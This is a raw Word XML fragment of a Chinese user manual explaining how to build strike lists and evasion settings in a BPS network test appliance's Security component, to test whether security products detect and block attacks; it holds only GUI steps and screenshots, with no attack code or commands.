          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1420" w:right="1680" w:bottom="280" w:left="1680" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_Toc499884740"/>
      <w:r w:rsidRPr="002A0C5E">
        <w:lastRenderedPageBreak/>
        <w:t>Security 组件的测试使</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BPS</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>测试仪有一个包含威胁攻击库，涵盖了往年比较典型的威胁漏洞，常用来做安全防护产品的攻击检测测试。下面来介绍下</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BPS</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>测试仪security组件的使用要点：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>参照章节二的端口占用以及章节三中的 1~6 步完成 Neighborhood 的创建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击 Manager-Strike Lists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击右下角的Create New 创建一个新的威胁攻击列表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击右下角的 Add Strike，在弹出的窗口中可以看到目前所使用的设备中包含的威胁攻击库的个数，目前截图的设备包含 38840 种</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="0053045B" w:rsidRPr="002A0C5E">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="152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2BA25B8F" wp14:editId="0E9F3FDD">
            <wp:extent cx="5337015" cy="2979229"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29724"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jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId400" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5337015" cy="2979229"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击开任意一个威胁攻击，可以看到它的名称和简单描述，并且在上面有标称他们属于哪种类型的协议以及攻击方向。同样也会列出该威胁攻击所被标识的CVE,BID 等编号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E61BCA2" wp14:editId="568E40EE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1143000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>123825</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5293360" cy="3187065"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="2972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4.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId401" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5293360" cy="3187065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在大量的威胁攻击中搜索到自己需要的可以通过 BPS 提供的 Advanced 过滤目标，在这里通过输入自己的过滤条件，</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>比如威胁漏洞发布的年份，严重程度，所属协议，cve编号，漏洞类型（通过keyword过滤）等</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>就可以搜索出需要的威胁列表，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="0053045B" w:rsidRPr="002A0C5E">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="144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2A5DDF80" wp14:editId="6E5400B2">
            <wp:extent cx="5293446" cy="3204210"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="29726"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402" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5293446" cy="3204210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>根据需要将需要发送的威胁添加进右侧的列表中，点击 ok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>这时在 Strike List 中添加进了需要使用的威胁攻击，点击save 进行保存</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击Test-NewTest，创建一个新的测试</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>首先在Network Neighborhood 中把第一步中创建好的给引入进来</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27ABACA5" wp14:editId="000AF2B6">
            <wp:extent cx="5209540" cy="2898775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="297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4.jpe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09540" cy="2898775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在 Test Components 中点击 Add new，选择 Security，点击 Select</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>给新创建的 Security Component 起个名称</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F0DEF82" wp14:editId="14AA1B55">
            <wp:extent cx="5205095" cy="2866390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29728"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jpe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205095" cy="2866390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>单击或者点击右侧的编辑进入该 Component</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CE74978" wp14:editId="2FFA6646">
            <wp:extent cx="5212715" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1905"/>
            <wp:docPr id="2972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0.jpe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212715" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>12、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>根据N</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eighborhood的</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>配置去选定</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>client和server对应的</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tags的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="0053045B" w:rsidRPr="002A0C5E">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="146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34325190" wp14:editId="096FDBC1">
            <wp:extent cx="5210848" cy="2866644"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="29730"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jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId406" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5210848" cy="2866644"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>13、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>选择 Strike List 右侧的编辑按钮，在弹出的对话框中输入之前创建好的威胁攻击列表，进行引入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="234E37CF" wp14:editId="0ABFB8A0">
            <wp:extent cx="5419725" cy="2895600"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="29731" name="图片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19725" cy="2895600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>14、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>如果有攻击逃逸测试需求，同样可以在此处引用新建的攻击逃逸模板，如上图所示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BPS测试仪当前支持网络层，传输层，应用层特定的一些协议负载的逃逸，比如ip分片，分片重叠，特殊字段重写，tcp分段，tcp分段重叠，tcp报文乱序，http负载编码，udp变端口，sumrpc协议逃逸，smtp协议逃逸等等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="781A7CFB" wp14:editId="2B39A57E">
            <wp:extent cx="5429250" cy="4760366"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="29732" name="图片 29732" descr="C:\Users\jbliao\AppData\Local\Microsoft\Windows\INetCache\Content.Word\`HI4$C`F3DE{YVN`(0B$T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liao\AppData\Local\Microsoft\Windows\INetCache\Content.Word\`HI4$C`F3DE{YVN`(0B$T9X.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29250" cy="4760366"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>15、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击右下角Return</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>est</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Workspace</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>返回到测试主页面，再</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击右下角的 Save and Run，给新创建的测试例起个名称，就可以开始测试了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="0053045B" w:rsidRPr="002A0C5E">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1480" w:right="1680" w:bottom="280" w:left="1680" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>16、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在运行测试完毕以后，我们可以在 Attacks 的统计窗口观察具体测试统计，因为目前是B2B  的测试环境，没有被测设备在中间，所以仿真的威胁攻击都没有被阻断，所以截图中 Total Allowed=4，而且因为没有防御成功，所以测试结果显示失败。正常情况下如果防御阻断成功，在相应的位置会有阻断的个数显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D8E936F" wp14:editId="41BB0029">
            <wp:extent cx="5209540" cy="2862580"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2973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jpe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209540" cy="2862580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>17、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击左下角的 Report 按钮，跳转至测试结果详细统计窗口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="0053045B" w:rsidRPr="002A0C5E">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1460" w:right="1680" w:bottom="280" w:left="1680" w:header="720" w:footer="720" w:gutter="0"/>
